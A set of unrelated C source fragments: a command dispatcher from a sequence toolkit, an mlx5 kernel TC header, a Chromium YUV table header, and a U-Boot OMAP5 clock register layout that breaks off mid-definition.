"subseq") == 0) return stk_subseq(argc-1, argv+1); else if (strcmp(argv[1], "mutfa") == 0) return stk_mutfa(argc-1, argv+1); else if (strcmp(argv[1], "mergefa") == 0) return stk_mergefa(argc-1, argv+1); else if (strcmp(argv[1], "mergepe") == 0) return stk_mergepe(argc-1, argv+1); else if (strcmp(argv[1], "dropse") == 0) return stk_dropse(argc-1, argv+1); else if (strcmp(argv[1], "randbase") == 0) return stk_randbase(argc-1, argv+1); else if (strcmp(argv[1], "cutN") == 0) return stk_cutN(argc-1, argv+1); else if (strcmp(argv[1], "gap") == 0) return stk_gap(argc-1, argv+1); else if (strcmp(argv[1], "listhet") == 0) return stk_listhet(argc-1, argv+1); else if (strcmp(argv[1], "famask") == 0) return stk_famask(argc-1, argv+1); else if (strcmp(argv[1], "trimfq") == 0) return stk_trimfq(argc-1, argv+1); else if (strcmp(argv[1], "hrun") == 0) return stk_hrun(argc-1, argv+1); else if (strcmp(argv[1], "sample") == 0) return stk_sample(argc-1, argv+1); else if (strcmp(argv[1], "seq") == 0) return stk_seq(argc-1, argv+1); else if (strcmp(argv[1], "kfreq") == 0) return stk_kfreq(argc-1, argv+1); else if (strcmp(argv[1], "rename") == 0) return stk_rename(argc-1, argv+1); else if (strcmp(argv[1], "split") == 0) return stk_split(argc-1, argv+1); else if (strcmp(argv[1], "hpc") == 0) return stk_hpc(argc-1, argv+1); else { fprintf(stderr, "[main] unrecognized command '%s'. Abort!\n", argv[1]); return 1; } }
{ "language": "C" }
/* SPDX-License-Identifier: GPL-2.0 OR Linux-OpenIB */ /* Copyright (c) 2020 Mellanox Technologies. */ #ifndef __MLX5_EN_REP_TC_H__ #define __MLX5_EN_REP_TC_H__ #include <linux/skbuff.h> #include "en_tc.h" #include "en_rep.h" #if IS_ENABLED(CONFIG_MLX5_CLS_ACT) int mlx5e_rep_tc_init(struct mlx5e_rep_priv *rpriv); void mlx5e_rep_tc_cleanup(struct mlx5e_rep_priv *rpriv); int mlx5e_rep_tc_netdevice_event_register(struct mlx5e_rep_priv *rpriv); void mlx5e_rep_tc_netdevice_event_unregister(struct mlx5e_rep_priv *rpriv); void mlx5e_rep_tc_enable(struct mlx5e_priv *priv); void mlx5e_rep_tc_disable(struct mlx5e_priv *priv); int mlx5e_rep_tc_event_port_affinity(struct mlx5e_priv *priv); void mlx5e_rep_update_flows(struct mlx5e_priv *priv, struct mlx5e_encap_entry *e, bool neigh_connected, unsigned char ha[ETH_ALEN]); int mlx5e_rep_encap_entry_attach(struct mlx5e_priv *priv, struct mlx5e_encap_entry *e); void mlx5e_rep_encap_entry_detach(struct mlx5e_priv *priv, struct mlx5e_encap_entry *e); int mlx5e_rep_setup_tc(struct net_device *dev, enum tc_setup_type type, void *type_data); bool mlx5e_rep_tc_update_skb(struct mlx5_cqe64 *cqe, struct sk_buff *skb, struct mlx5e_tc_update_priv *tc_priv); void mlx5_rep_tc_post_napi_receive(struct mlx5e_tc_update_priv *tc_priv); #else /* CONFIG_MLX5_CLS_ACT */ struct mlx5e_rep_priv; static inline int mlx5e_rep_tc_init(struct mlx5e_rep_priv *rpriv) { return 0; } static inline void mlx5e_rep_tc_cleanup(struct mlx5e_rep_priv *rpriv) {} static inline int mlx5e_rep_tc_netdevice_event_register(struct mlx5e_rep_priv *rpriv) { return 0; } static inline void mlx5e_rep_tc_netdevice_event_unregister(struct mlx5e_rep_priv *rpriv) {} static inline void mlx5e_rep_tc_enable(struct mlx5e_priv *priv) {} static inline void mlx5e_rep_tc_disable(struct mlx5e_priv *priv) {} static inline int mlx5e_rep_tc_event_port_affinity(struct mlx5e_priv *priv) { return NOTIFY_DONE; } static inline int mlx5e_rep_setup_tc(struct net_device *dev, enum tc_setup_type type, void *type_data) { return -EOPNOTSUPP; } struct mlx5e_tc_update_priv; static inline bool mlx5e_rep_tc_update_skb(struct mlx5_cqe64 *cqe, struct sk_buff *skb, struct mlx5e_tc_update_priv *tc_priv) { return true; } static inline void mlx5_rep_tc_post_napi_receive(struct mlx5e_tc_update_priv *tc_priv) {} #endif /* CONFIG_MLX5_CLS_ACT */ #endif /* __MLX5_EN_REP_TC_H__ */
{ "language": "C" }
// Copyright (c) 2011 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. // Defines convertion table from YUV to RGB. #ifndef MEDIA_BASE_SIMD_YUV_TO_RGB_TABLE_H_ #define MEDIA_BASE_SIMD_YUV_TO_RGB_TABLE_H_ #include "base/basictypes.h" #include "build/build_config.h" extern "C" { #if defined(COMPILER_MSVC) #define SIMD_ALIGNED(var) __declspec(align(16)) var #else #define SIMD_ALIGNED(var) var __attribute__((aligned(16))) #endif // Align the table to 16-bytes to allow faster reading. extern SIMD_ALIGNED(int16 kCoefficientsRgbY[768][4]); } // extern "C" #endif // MEDIA_BASE_SIMD_YUV_TO_RGB_TABLE_H_
{ "language": "C" }
/* * (C) Copyright 2010 * Texas Instruments, <www.ti.com> * * Aneesh V <aneesh@ti.com> * Sricharan R <r.sricharan@ti.com> * * See file CREDITS for list of people who contributed to this * project. * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License as * published by the Free Software Foundation; either version 2 of * the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, * MA 02111-1307 USA */ #ifndef _CLOCKS_OMAP5_H_ #define _CLOCKS_OMAP5_H_ #include <common.h> /* * Assuming a maximum of 1.5 GHz ARM speed and a minimum of 2 cycles per * loop, allow for a minimum of 2 ms wait (in reality the wait will be * much more than that) */ #define LDELAY 1000000 #define CM_CLKMODE_DPLL_CORE (OMAP54XX_L4_CORE_BASE + 0x4120) #define CM_CLKMODE_DPLL_PER (OMAP54XX_L4_CORE_BASE + 0x8140) #define CM_CLKMODE_DPLL_MPU (OMAP54XX_L4_CORE_BASE + 0x4160) #define CM_CLKSEL_CORE (OMAP54XX_L4_CORE_BASE + 0x4100) struct omap5_prcm_regs { /* cm1.ckgen */ u32 cm_clksel_core; /* 4a004100 */ u32 pad001[1]; /* 4a004104 */ u32 cm_clksel_abe; /* 4a004108 */ u32 pad002[1]; /* 4a00410c */ u32 cm_dll_ctrl; /* 4a004110 */ u32 pad003[3]; /* 4a004114 */ u32 cm_clkmode_dpll_core; /* 4a004120 */ u32 cm_idlest_dpll_core; /* 4a004124 */ u32 cm_autoidle_dpll_core; /* 4a004128 */ u32 cm_clksel_dpll_core; /* 4a00412c */ u32 cm_div_m2_dpll_core; /* 4a004130 */ u32 cm_div_m3_dpll_core; /* 4a004134 */ u32 cm_div_h11_dpll_core; /* 4a004138 */ u32 cm_div_h12_dpll_core; /* 4a00413c */ u32 cm_div_h13_dpll_core; /* 4a004140 */ u32 cm_div_h14_dpll_core; /* 4a004144 */ u32 cm_ssc_deltamstep_dpll_core; /* 4a004148 */ u32 cm_ssc_modfreqdiv_dpll_core; /* 4a00414c */ u32 cm_emu_override_dpll_core; /* 4a004150 */ u32 cm_div_h22_dpllcore; /* 4a004154 */ u32 cm_div_h23_dpll_core; /* 4a004158 */ u32 pad0041[1]; /* 4a00415c */ u32 cm_clkmode_dpll_mpu; /* 4a004160 */ u32 cm_idlest_dpll_mpu; /* 4a004164 */ u32 cm_autoidle_dpll_mpu; /* 4a004168 */ u32 cm_clksel_dpll_mpu; /* 4a00416c */ u32 cm_div_m2_dpll_mpu; /* 4a004170 */ u32 pad005[5]; /* 4a004174 */ u32 cm_ssc_deltamstep_dpll_mpu; /* 4a004188 */ u32 cm_ssc_modfreqdiv_dpll_mpu; /* 4a00418c */ u32 pad006[3]; /* 4a004190 */ u32 cm_bypclk_dpll_mpu; /* 4a00419c */ u32 cm_clkmode_dpll_iva; /* 4a0041a0 */ u32 cm_idlest_dpll_iva; /* 4a0041a4 */ u32 cm_autoidle_dpll_iva; /* 4a0041a8 */ u32 cm_clksel_dpll_iva; /* 4a0041ac */ u32 pad007[2]; /* 4a0041b0 */ u32 cm_div_h11_dpll_iva; /* 4a0041b8 */ u32 cm_div_h12_dpll_iva; /* 4a0041bc */ u32 pad008[2]; /* 4a0041c0 */ u32 cm_ssc_deltamstep_dpll_iva; /* 4a0041c8 */ u32 cm_ssc_modfreqdiv_dpll_iva; /* 4a0041cc */ u32 pad009[3]; /* 4a0041d0 */ u32 cm_bypclk_dpll_iva; /* 4a0041dc */ u32 cm_clkmode_dpll_abe; /* 4a0041e0 */ u32 cm_idlest_dpll_abe; /* 4a0041e4 */ u32 cm_autoidle_dpll_abe; /* 4a0041e8 */ u32 cm_clksel_dpll_abe; /* 4a0041ec */ u32 cm_div_m2_dpll_abe; /* 4a0041f0 */ u32 cm_div_m3_dpll_abe; /* 4a0041f4 */ u32 pad010[4]; /* 4a0041f8 */ u32 cm_ssc_deltamstep_dpll_abe; /* 4a004208 */ u32 cm_ssc_modfreqdiv_dpll_abe; /* 4a00420c */ u32 pad011[4]; /* 4a004210 */ u32 cm_clkmode_dpll_ddrphy; /* 4a004220 */ u32 cm_idlest_dpll_ddrphy; /* 4a004224 */ u32 cm_autoidle_dpll_ddrphy; /* 4a004228 */ u32 cm_clksel_dpll_ddrphy; /* 4a00422c */ u32 cm_div_m2_dpll_ddrphy; /* 4a004230 */ u32 pad012[1]; /* 4a004234 */ u32 cm_div_h11_dpll_ddrphy; /* 4a004238 */ u32 cm_div_h12_dpll_ddrphy; /* 4a00423c */ u32 cm_div_h13_dpll_ddrphy; /* 4a004240 */ u32 pad013[1]; /* 4a004244 */ u32 cm_ssc_deltamstep_dpll_ddrphy; /* 4a004248 */ u32 pad014[5]; /* 4a00424c */ u32 cm_shadow_freq_config1; /* 4a004260 */ u32 pad0141[47]; /* 4a004264 */ u32 cm_mpu_mpu_clkctrl; /* 4a004320 */ /* cm1.dsp */ u32 pad015[55]; /* 4a004324 */ u32 cm_dsp_clkstctrl; /* 4a004400 */ u32 pad016[7]; /* 4a004404 */ u32 cm_dsp_dsp_clkctrl; /* 4a004420 */ /* cm1.abe */ u32 pad017[55]; /* 4a004424 */ u32 cm1_abe_clkstctrl; /* 4a004500 */ u32 pad018[7]; /* 4a004504 */ u32 cm1_abe_l4abe_clkctrl; /* 4a004520 */ u32 pad019[1]; /* 4a004524 */ u32 cm1_abe_aess_clkctrl; /* 4a004528 */ u32 pad020[1]; /* 4a00452c */ u32 cm1_abe_pdm_clkctrl; /* 4a004530 */ u32 pad021[1]; /* 4a004534 */ u32 cm1_abe_dmic_clkctrl; /* 4a004538 */ u32 pad022[1]; /* 4a00453c */ u32 cm1_abe_mcasp_clkctrl; /* 4a004540 */ u32 pad023[1]; /* 4a004544 */ u32 cm1_abe_mcbsp1_clkctrl; /* 4a004548 */ u32 pad024[1]; /* 4a00454c */ u32 cm1_abe_mcbsp2_clkctrl; /* 4a004550 */ u32 pad025[1]; /* 4a004554 */ u32 cm1_abe_mcbsp3_clkctrl; /* 4a004558 */ u32 pad026[1]; /* 4a00455c */ u32 cm1_abe_slimbus_clkctrl; /* 4a004560 */ u32 pad027[1]; /* 4a004564 */ u32 cm1_abe_timer5_clkctrl; /* 4a004568 */ u32 pad028[1]; /* 4a00456c */ u32 cm1_abe_timer6_clkctrl; /* 4a004570 */ u32 pad029[1]; /* 4a004574 */ u32 cm1_abe_timer7_clkctrl; /* 4a004578 */ u32 pad030[1]; /* 4a00457c */ u32 cm1_abe_timer8_clkctrl; /* 4a004580 */ u32 pad031[1]; /* 4a004584 */ u32 cm1_abe_wdt3_clkctrl; /* 4a004588 */ /* cm2.ckgen */ u32 pad032[3805]; /* 4a00458c */ u32 cm_clksel_mpu_m3_iss_root; /* 4a008100 */ u32 cm_clksel_usb_60mhz; /* 4a008104 */ u32 cm_scale_fclk; /* 4a008108 */ u32 pad033[1]; /* 4a00810c */ u32 cm_core_dvfs_perf1; /* 4a008110 */ u32 cm_core_dvfs_perf2; /* 4a008114 */ u32 cm_core_dvfs_perf3; /* 4a008118 */ u32 cm_core_dvfs_perf4; /* 4a00811c */ u32 pad034[1]; /* 4a008120 */ u32 cm_core_dvfs_current; /* 4a008124 */ u32 cm_iva_dvfs_perf_tesla; /* 4a008128 */ u32 cm_iva_dvfs_perf_ivahd; /* 4a00812c */ u32 cm_iva_dvfs_perf_abe; /* 4a008130 */ u32 pad035[1]; /* 4a008134 */ u32 cm_iva_dvfs_current; /* 4a008138 */ u32 pad036[1]; /* 4a00813c */ u32 cm_clkmode_dpll_per; /* 4a008140 */ u32 cm_idlest_dpll_per; /* 4a008144 */ u32 cm_autoidle_dpll_per; /* 4a008148 */ u32 cm_clksel_dpll_per; /* 4a00814c */ u32 cm_div_m2_dpll_per; /* 4a008150 */ u32 cm_div_m3_dpll_per; /* 4a008154 */ u32 cm_div_h11_dpll_per; /* 4a008158 */ u32 cm_div_h12_dpll_per; /* 4a00815c */ u32 pad0361[1]; /* 4a008160 */ u32 cm_div_h14_dpll_per; /* 4a008164 */ u32 cm_ssc_deltamstep_dpll_per; /* 4a008168 */ u32 cm_ssc_modfreqdiv_dpll_per; /* 4a00816c */ u32 cm_emu_override_dpll_per; /* 4a008170 */ u32 pad037[3]; /* 4a008174 */ u32 cm_clkmode_dpll_usb; /* 4a008180 */ u32 cm_idlest_dpll_usb; /* 4a008184 */ u32 cm_autoidle_dpll_usb; /* 4a008188 */ u32 cm_clksel_dpll_usb; /* 4a00818c */ u32 cm_div_m2_dpll_usb; /* 4a008190 */ u32 pad038[5]; /* 4a008194 */ u32 cm_ssc_deltamstep_dpll_usb; /* 4a0081a8 */ u32 cm_ssc_modfreqdiv_dpll_usb; /* 4a0081ac */ u32 pad039[1]; /* 4a0081b0 */ u32 cm_clkdcoldo_dpll_usb; /* 4a0081b4 */ u32 pad040[2]; /* 4a0081b8 */ u32 cm_clkmode_dpll_unipro; /* 4a0081c0 */ u32 cm_idlest_dpll_unipro; /* 4a0081c4 */ u32 cm_autoidle_dpll_unipro; /* 4a0081c8 */ u32 cm_clksel_dpll_unipro; /* 4a0081cc */ u32 cm_div_m2_dpll_unipro; /* 4a0081d0 */ u32 pad041[5]; /* 4a0081d4 */ u32 cm_ssc_deltamstep_dpll_unipro; /* 4a0081e8 */ u32 cm_ssc_modfreqdiv_dpll_unipro; /* 4a0081ec */ /* cm2.core */ u32 pad0411[324]; /* 4a0081f0 */ u32 cm_l3_1_clkstctrl; /* 4a008700 */ u32 pad042[1]; /* 4a008704 */ u32 cm_l3_1_dynamicdep; /* 4a008708 */ u32 pad043[5]; /* 4a00870c */ u32 cm_l3_1_l3_1_clkctrl; /* 4a008720 */ u32 pad044[55]; /* 4a008724 */ u32 cm_l3_2_clkstctrl; /* 4a008800 */ u32 pad045[1]; /* 4a008804 */ u32 cm_l3_2_dynamicdep; /* 4a008808 */ u32 pad046[5]; /* 4a00880c */ u32 cm_l3_2_l3_2_clkctrl; /* 4a008820 */ u32 pad047[1]; /* 4a008824 */ u32 cm_l3_2_gpmc_clkctrl; /* 4a008828 */ u32 pad048[1]; /* 4a00882c */ u32 cm_l3_2_ocmc_ram_clkctrl; /* 4a008830 */ u32 pad049[51]; /* 4a008834 */ u32 cm_mpu_m3_clkstctrl; /* 4a008900 */ u32 cm_mpu_m3_staticdep; /* 4a008904 */ u32 cm_mpu_m3_dynamicdep; /* 4a008908 */ u32 pad050[5]; /* 4a00890c */ u32 cm_mpu_m3_mpu_m3_clkctrl; /* 4a008920 */ u32 pad051[55]; /* 4a008924 */ u32 cm_sdma_clkstctrl; /* 4a008a00 */ u32 cm_sdma_staticdep; /* 4a008a04 */ u32 cm_sdma_dynamicdep; /* 4a008a08 */ u32 pad052[5]; /* 4a008a0c */ u32 cm_sdma_sdma_clkctrl; /* 4a008a20 */ u32 pad053[55]; /* 4a008a24 */ u32 cm_memif_clkstctrl; /* 4a008b00 */ u32 pad054[7]; /* 4a008b04 */ u32 cm_memif_dmm_clkctrl; /* 4a008b20 */ u32 pad055[1]; /* 4a008b24 */ u32 cm_memif_emif_fw_clkctrl; /* 4a008b28 */ u32 pad056[1]; /* 4a008b2c */ u32 cm_memif_emif_1_clkctrl; /* 4a008b30 */ u32 pad057[1]; /* 4a008b34 */ u32 cm_memif_emif_2_clkctrl; /* 4a008b38 */ u32 pad058[1]; /* 4a008b3c */ u32 cm_memif_dll_clkctrl; /* 4a008b40 */ u32 pad059[3]; /* 4a008b44 */ u32 cm_memif_emif_h1_clkctrl; /* 4a008b50 */ u32 pad060[1]; /* 4a008b54 */ u32 cm_memif_emif_h2_clkctrl; /* 4a008b58 */ u32 pad061[1]; /* 4a008b5c */ u32 cm_memif_dll_h_clkctrl; /* 4a008b60 */ u32 pad062[39]; /* 4a008b64 */ u32 cm_c2c_clkstctrl; /* 4a008c00 */ u32 cm_c2c_staticdep; /* 4a008c04 */ u32 cm_c2c_dynamicdep; /* 4a008c08 */ u32 pad063[5]; /* 4a008c0c */ u32 cm_c2c_sad2d_clkctrl; /* 4a008c20 */ u32 pad064[1]; /* 4a008c24 */ u32 cm_c2c_modem_icr_clkctrl; /* 4a008c28 */ u32 pad065[1]; /* 4a008c2c */ u32 cm_c2c_sad2d_fw_clkctrl; /* 4a008c30 */ u32 pad066[51]; /* 4a008c34 */ u32 cm_l4cfg_clkstctrl; /* 4a008d00 */ u32 pad067[1]; /* 4a008d04 */ u32 cm_l4cfg_dynamicdep; /* 4a008d08 */ u32 pad068[5]; /* 4a008d0c */ u32 cm_l4cfg_l4_cfg_clkctrl; /* 4a008d20 */ u32 pad069[1]; /* 4a008d24 */ u32 cm_l4cfg_hw_sem_clkctrl; /* 4a008d28 */ u32 pad070[1]; /* 4a008d2c */ u32 cm_l4cfg_mailbox_clkctrl; /* 4a008d30 */ u32 pad071[1]; /* 4a008d34 */ u32 cm_l4cfg_sar_rom_clkctrl; /* 4a008d38 */ u32 pad072[49]; /* 4a008d3c */ u32 cm_l3instr_clkstctrl; /* 4a008e00 */ u32 pad073[7]; /* 4a008e04 */ u32 cm_l3instr_l3_3_clkctrl; /* 4a008e20 */ u32 pad074[1]; /* 4a008e24 */ u32 cm_l3instr_l3_instr_clkctrl; /* 4a008e28 */ u32 pad075[5]; /* 4a008e2c */ u32 cm_l3instr_intrconn_wp1_clkctrl; /* 4a008e40 */ /* cm2.ivahd */ u32 pad076[47]; /* 4a008e44 */ u32 cm_ivahd_clkstctrl; /* 4a008f00 */ u32 pad077[7]; /* 4a008f04 */ u32 cm_ivahd_ivahd_clkctrl; /* 4a008f20 */ u32 pad078[1]; /* 4a008f24 */ u32 cm_ivahd_sl2_clkctrl; /* 4a008f28 */ /* cm2.cam */ u32 pad079[53]; /* 4a008f2c */ u32 cm_cam_clkstctrl; /* 4a009000 */ u32 pad080[7]; /* 4a009004 */ u32 cm_cam_iss_clkctrl; /* 4a009020 */ u32 pad081[1]; /* 4a009024 */ u32 cm_cam_fdif_clkctrl; /* 4a009028 */ /* cm2.dss */ u32 pad082[53]; /* 4a00902c */ u32 cm_dss_clkstctrl; /* 4a009100 */ u32 pad083[7]; /* 4a009104 */ u32 cm_dss_dss_clkctrl; /* 4a009120 */ /* cm2.sgx */ u32 pad084[55]; /* 4a009124 */ u32 cm_sgx_clkstctrl; /* 4a009200 */ u32 pad085[7]; /* 4a009204 */ u32 cm_sgx_sgx_clkctrl; /* 4a009220 */ /* cm2.l3init */ u32 pad086[55]; /* 4a009224 */ u32 cm_l3init_clkstctrl; /* 4a009300 */ /* cm2.l3init */ u32 pad087[9]; /* 4a009304 */ u32 cm_l3init_hsmmc1_clkctrl; /* 4a009328 */ u32 pad088[1]; /* 4a00932c */ u32 cm_l3init_hsmmc2_clkctrl; /* 4a009330 */ u32 pad089[1]; /* 4a009334 */ u32 cm_l3init_hsi_clkctrl; /* 4a009338 */ u32 pad090[7]; /* 4a00933c */ u32 cm_l3init_hsusbhost_clkctrl; /* 4a009358 */ u32 pad091[1]; /* 4a00935c */ u32 cm_l3init_hsusbotg_clkctrl; /* 4a009360 */ u32 pad092[1]; /* 4a009364 */ u32 cm_l3init_hsusbtll_clkctrl; /* 4a009368 */ u32 pad093[3]; /* 4a00936c */ u32 cm_l3init_p1500_clkctrl; /* 4a009378 */ u32 pad094[21]; /* 4a00937c */ u32 cm_l3init_fsusb_clkctrl; /* 4a0093d0 */ u32 pad095[3]; /* 4a0093d4 */ u32 cm_l3init_ocp2scp1_clkctrl; /* cm2.l4per */ u32 pad096[7]; /* 4a0093e4 */ u32 cm_l4per_clkstctrl; /* 4a009400 */ u32 pad097[1]; /* 4a009404 */ u32 cm_l4per_dynamicdep; /* 4a009408 */ u32 pad098[5]; /* 4a00940c */ u32 cm_l4per_adc_clkctrl; /* 4a009420 */ u32 pad100[1]; /* 4a009424 */ u32 cm_l4per_gptimer10_clkctrl; /* 4a009428 */ u32 pad101[1]; /* 4a00942c */ u32 cm_l4per_gptimer11_clkctrl; /* 4a009430 */ u32 pad102[1]; /* 4a009434 */ u32 cm_l4per_gptimer2_clkctrl; /* 4a009438 */ u32 pad103[1]; /* 4a00943c */ u32 cm_l4per_gptimer3_clkctrl; /* 4a009440 */ u32 pad104[1]; /* 4a009444 */ u32 cm_l4per_gptimer4_clkctrl; /* 4a009448 */ u32 pad105[1]; /* 4a00944c */ u32 cm_l4per_gptimer9_clkctrl; /* 4a009450 */ u32 pad106[1]; /* 4a009454 */ u32 cm_l4per_elm_clkctrl; /* 4a009458 */ u32 pad107[1]; /* 4a00945c */ u32 cm_l4per_gpio2_clkctrl; /* 4a009460 */ u32 pad108[1]; /* 4a009464 */ u32 cm_l4per_gpio3_clkctrl; /* 4a009468 */ u32 pad109[1]; /* 4a00946c */ u32 cm_l4per_gpio4_clkctrl; /* 4a009470 */ u32 pad110[1]; /* 4a009474 */ u32 cm_l4per_gpio5_clkctrl; /* 4a009478 */ u32 pad111[1]; /* 4a00947c */ u32 cm_l4per_gpio6_clkctrl; /* 4a009480 */ u32 pad112[1]; /* 4a009484 */ u32 cm_l4per_hdq1w_clkctrl; /* 4a009488 */ u32 pad113[1]; /* 4a00948c */ u32 cm_l4per_hecc1_clkctrl; /* 4a009490 */ u32 pad114[1]; /* 4a009494 */ u32 cm_l4per_hecc2_clkctrl; /* 4a009498 */ u32 pad115[1]; /* 4a00949c */ u32 cm_l4per_i2c1_clkctrl; /* 4a0094a0 */ u32 pad116[1]; /* 4a0094a4 */ u32 cm_l4per_i2c2_clkctrl; /* 4a0094a8 */ u32 pad117[1]; /* 4a0094ac */ u32 cm_l4per_i2c3_clkctrl; /* 4a0094b0 */ u32 pad118[1]; /* 4a0094b4 */ u32 cm_l4per_i2c4_clkctrl; /* 4a0094b8 */ u32 pad119[1]; /* 4a0094bc */ u32 cm_l4per_l4per_clkctrl; /* 4a0094c0 */ u32 pad1191[3]; /* 4a0094c4 */ u32 cm_l4per_mcasp2_clkctrl; /* 4a0094d0 */ u32 pad120[1]; /* 4a0094d4 */ u32 cm_l4per_mcasp3_clkctrl; /* 4a0094d8 */ u32 pad121[3]; /* 4a0094dc */ u32 cm_l4per_mgate_clkctrl; /* 4a0094e8 */ u32 pad123[1]; /* 4a0094ec */ u32 cm_l4per_mcspi1_clkctrl; /* 4a0094f0 */ u32 pad124[1]; /* 4a0094f4 */ u32 cm_l4per_mcspi2_clkctrl; /* 4a0094f8 */ u32 pad125[1]; /* 4a0094fc */ u32 cm_l4per_mcspi3_clkctrl; /* 4a009500 */ u32 pad126[1]; /* 4a009504 */ u32 cm_l4per_mcspi4_clkctrl; /* 4a009508 */ u32 pad127[1]; /* 4a00950c */ u32 cm_l4per_gpio7_clkctrl; /* 4a009510 */ u32 pad1271[1]; /* 4a009514 */ u32 cm_l4per_gpio8_clkctrl; /* 4a009518 */ u32 pad1272[1]; /* 4a00951c */ u32 cm_l4per_mmcsd3_clkctrl; /* 4a009520 */ u32 pad128[1]; /* 4a009524 */ u32 cm_l4per_mmcsd4_clkctrl; /* 4a009528 */ u32 pad129[1]; /* 4a00952c */ u32 cm_l4per_msprohg_clkctrl; /* 4a009530 */ u32 pad130[1]; /* 4a009534 */ u32 cm_l4per_slimbus2_clkctrl; /* 4a009538 */ u32 pad131[1]; /* 4a00953c */ u32 cm_l4per_uart1_clkctrl; /* 4a009540 */ u32 pad132[1]; /* 4a009544 */ u32 cm_l4per_uart2_clkctrl; /* 4a009548 */ u32 pad133[1]; /* 4a00954c */ u32 cm_l4per_uart3_clkctrl; /* 4a009550 */ u32 pad134[1]; /* 4a009554 */ u32 cm_l4per_uart4_clkctrl; /* 4a009558 */ u32 pad135[1]; /* 4a00955c */ u32 cm_l4per_mmcsd5_clkctrl; /* 4a009560 */ u32 pad136[1]; /* 4a009564 */ u32 cm_l4per_i2c5_clkctrl; /* 4a009568 */ u32 pad1371[1]; /* 4a00956c */ u32 cm_l4per_uart5_clkctrl; /* 4a009570 */ u32 pad1372[1]; /* 4a009574 */ u32 cm_l4per_uart6_clkctrl; /* 4a009578 */ u32 pad1374[1]; /* 4a00957c */ u32 cm_l4sec_clkstctrl; /* 4a009580 */ u32 cm_l4sec_staticdep; /* 4a009584 */ u32 cm_l4sec_dynamicdep; /* 4a009588 */ u32 pad138[5]; /* 4a00958c */ u32 cm_l4sec_aes1_clkctrl; /* 4a0095a0 */ u32 pad139[1]; /* 4a0095a4 */ u32 cm_l4sec_aes2_clkctrl; /* 4a0095a8 */ u32 pad140[1]; /* 4a0095ac */ u32 cm_l4sec_des3des_clkctrl; /* 4a0095b0 */ u32 pad141[1]; /* 4a0095b4 */ u32 cm_l4sec_pkaeip29_clkctrl; /* 4a0095b8 */ u32 pad142[1]; /* 4a0095bc */ u32 cm_l4sec_rng_clkctrl; /* 4a0095c0 */ u32 pad143[1]; /* 4a0095c4 */ u32 cm_l4sec_sha2md51_clkctrl; /* 4a0095c8 */ u32 pad144[3]; /* 4a0095cc */ u32 cm_l4sec_cryptodma_clkctrl; /* 4a0095d8 */ u32 pad145[3660425]; /* 4a0095dc */ /* l4 wkup regs */ u32 pad201[6211]; /* 4ae00000 */ u32 cm_abe_pll_ref_clksel; /* 4ae0610c */ u32 cm_sys_clksel; /* 4ae06110 */ u32 pad202[1467]; /* 4ae06114 */ u32 cm_wkup_clkstctrl; /* 4ae07800 */ u32 pad203[7]; /* 4ae07804 */ u32 cm_wkup_l4wkup_clkctrl; /* 4ae07820 */ u32 pad204; /* 4ae07824 */ u32 cm_wkup_wdtimer1_clkctrl; /* 4ae07828 */ u32 pad205; /* 4ae0782c */ u32 cm_wkup_wdtimer2_clkctrl; /* 4ae07830 */ u32 pad206; /* 4ae07834 */ u32 cm_wkup_gpio1_clkctrl; /* 4ae07838 */ u32 pad207; /* 4ae0783c */ u32 cm_wkup_gptimer1_clkctrl; /* 4ae07840 */ u32 pad208; /* 4ae07844 */ u32 cm_wkup_gptimer12_clkctrl; /* 4ae07848 */ u32 pad209; /* 4ae0784c */ u32 cm_wkup_synctimer_clkctrl; /* 4ae07850 */ u32 pad210; /* 4ae07854 */ u32 cm_wkup_usim_clkctrl; /* 4ae07858 */ u32 pad211; /* 4ae0785c */ u32 cm_wkup_sarram_clkctrl; /* 4ae07860 */ u32 pad212[5]; /* 4ae07864 */ u32 cm_wkup_keyboard_clkctrl; /* 4ae07878 */ u32 pad213; /* 4ae0787c */ u32 cm_wkup_rtc_clkctrl; /* 4ae07880 */ u32 pad214; /* 4ae07884 */ u32 cm_wkup_bandgap_clkctrl; /* 4ae07888 */ u32 pad215[1]; /* 4ae0788c */ u32 cm_wkupaon_scrm_clkctrl; /* 4ae07890 */ u32 pad216[195]; u32 prm_vc_val_bypass; /* 4ae07ba0 */ u32 pad217[4]; u32 prm_vc_cfg_i2c_mode; /* 4ae07bb4 */ u32 prm_vc_cfg_i2c_clk; /* 4ae07bb8 */ u32 pad218[2]; u32 prm_sldo_core_setup; /* 4ae07bc4 */ u32 prm_sldo_core_ctrl; /* 4ae07bc8 */ u32 prm_sldo_mpu_setup; /* 4ae07bcc */ u32 prm_sldo_mpu_ctrl; /* 4ae07bd0 */ u32 prm_sldo_mm_setup; /* 4ae07bd4 */ u32 prm_sldo_mm_ctrl; /* 4ae07bd8 */ }; /* DPLL register offsets */ #define CM_CLKMODE_DPLL 0 #define CM_IDLEST_DPLL 0x4 #define CM_AUTOIDLE_DPLL 0x8 #define CM_CLKSEL_DPLL 0xC #define DPLL_CLKOUT_DIV_MASK 0x1F /* post-divider mask */ /* CM_DLL_CTRL */ #define CM_DLL_CTRL_OVERRIDE_SHIFT 0 #define CM_DLL_CTRL_OVERRIDE_MASK (1 << 0) #define CM_DLL_CTRL_NO_OVERRIDE 0 /* CM_CLKMODE_DPLL */ #define CM_CLKMODE_DPLL_REGM4XEN_SHIFT 11 #define CM_CLKMODE_DPLL_REGM4XEN_MASK (1 << 11) #define CM_CLKMODE_DPLL_LPMODE_EN_SHIFT 10 #define CM_CLKMODE_DPLL_LPMODE_EN_MASK (1 << 10) #define CM_CLKMODE_DPLL_RELOCK_RAMP_EN_SHIFT 9 #define CM_CLKMODE_DPLL_RELOCK_RAMP_EN_MASK (1 << 9) #define CM_CLKMODE_DPLL_DRIFTGUARD_EN_SHIFT 8 #define CM_CLKMODE_DPLL_DRIFTGUARD_EN_MASK (1 << 8) #define CM_CLKMODE_DPLL_RAMP_RATE_SHIFT 5 #define CM_CLKMODE_DPLL_RAMP_RATE_MASK (0x7 << 5) #define CM_CLKMODE_DPLL_EN_SHIFT 0 #define CM_CLKMODE_DPLL_EN_MASK (0x7 << 0) #define CM_CLKMODE_DPLL_DPLL_EN_SHIFT 0 #define 